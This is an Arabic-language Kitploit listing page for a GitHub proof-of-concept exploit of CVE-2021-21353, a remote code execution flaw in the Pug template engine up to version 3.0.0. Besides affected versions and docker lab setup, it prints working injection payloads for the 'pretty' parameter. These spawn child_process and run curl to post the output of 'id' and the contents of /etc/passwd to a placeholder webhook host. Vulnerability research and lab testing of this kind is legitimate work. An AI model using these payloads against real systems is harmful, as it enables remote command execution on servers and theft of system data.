Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PUG-RCE-CVE-2021-21353-POC — استغلال إثبات المفهوم لـ CVE-2021-21353، وهي ثغرة تنفيذ التعليمات البرمجية عن بُعد في محرك قوالب Pug الإصدارات <=3.0.0. يوضح حقن الحمولة عبر معلمة 'pretty' لتنفيذ أوامر عشوائية. | Kitploit
أدوات/GitHubGitHub/jinsu9758/pug-rce-cve-2021-21353-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubjinsu9758/pug-rce-cve-2021-21353-poc

PUG-RCE-CVE-2021-21353-POC

استغلال إثبات المفهوم لـ CVE-2021-21353، وهي ثغرة تنفيذ التعليمات البرمجية عن بُعد في محرك قوالب Pug الإصدارات <=3.0.0. يوضح حقن الحمولة عبر معلمة 'pretty' لتنفيذ أوامر عشوائية.

عرض المستودع
25منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PUG-RCE (CVE-2021-21353) POC

معلومات الثغرة

رقم CVE : cve-2021-21353
درجة CVSS : 8.1

< الإصدارات المعرضة للخطر >
pug_version <= 3.0.0
2.0.3 < pug-code-gen version, 3.0.0<= pug-code-gen version < 3.0.2


إعداد البيئة

git clone https://github.com/jinsu9758/PUG-RCE-CVE-2021-21353-POC.git
cd PUG-RCE-CVE-2021-21353-POC
sudo docker compose up

※ يمكن الوصول عبر المنفذ 3000


Payload

اختبار الحمولة
?pretty=');console.log('executed');//

الحمولة النهائية
?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(id)\" <webhook_site>');_=('

?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(cat /etc/passwd)\" <webhook_site>');_=('

تنزيل الأداة